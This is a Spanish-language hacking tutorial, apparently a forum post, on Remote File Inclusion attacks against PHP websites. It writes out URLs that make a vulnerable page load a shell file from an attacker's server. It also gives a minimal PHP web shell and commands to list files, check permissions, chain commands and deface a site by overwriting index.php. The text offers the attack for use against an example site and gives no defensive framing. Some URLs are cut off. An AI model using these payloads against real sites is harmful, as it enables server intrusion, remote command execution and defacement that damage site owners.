bueno amigos esto es básicamente un ataque que se realiza a url en php,
Esta vulneravilidad solo existe en Paginas programas en PHP, que permitan agregar enlaces a archivos remotos situados en otros servidores y paginas web, sea provocada por un error al programar, En la cual Puedes entrar a muchos lugares con los siguientes comandos.
La pagina puede ser vulnerable a ataques RFI si la url es similar a esta que tenemos aqui:
http://[servidor_victima]/index.php?.
Para obtener la shell de la web solo necesitamos este codigo:
http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.
Esa seria una web vulnerable como Ejemplo:http//ww.rush.com/index.php?
Para poder hacer un ataque RFI tendremos que hacer esto:
http://www.rush.com/index.php?page=h...?&cmd=(comando)
Para saber si es vulnerable en el block de notas se escribe lo siguinte:
<?
system($cmd)
?>
ahora lo guardamos con el nombre de shell.txt y lo subimos a un servidor, de preferencia que no sea php para que no se ejecute en el nuestro (servidor)
ahora procedemos a usar esto:
http://www.rush.com/index.php?page=h...txt?&cmd=(aqui va el comando.)
y listo asi se podrá explorar el comando.
Un ejemplo de una shell explotada:
http://www.rush.com/index.php?page=h...l.txt?&cmd=pwd
pwd—> nos muestra en que parte del servidor estamos por ejemplo:
Home/host/www
Una Shell para sobreescribir un archivo es:
/shell.txt?&cmd=Defaced By: rUsH >index.php.
Para ejecutar mas de un comando solo se usa esto “;”
/shell.txt?&cmd=[coamando];[Comando];[Comando]
Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar se usa este comando
/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos
Para saber los datos de la DB se usa este comando:
/shell.txt?&cmd=cd
y listo bueno hay mas cosas que se puedes agregar para conseguir mas cosas solo hace falta la imaginación y la paciencia
bueno espero que séa una buena utilidad.
Saludos
Autor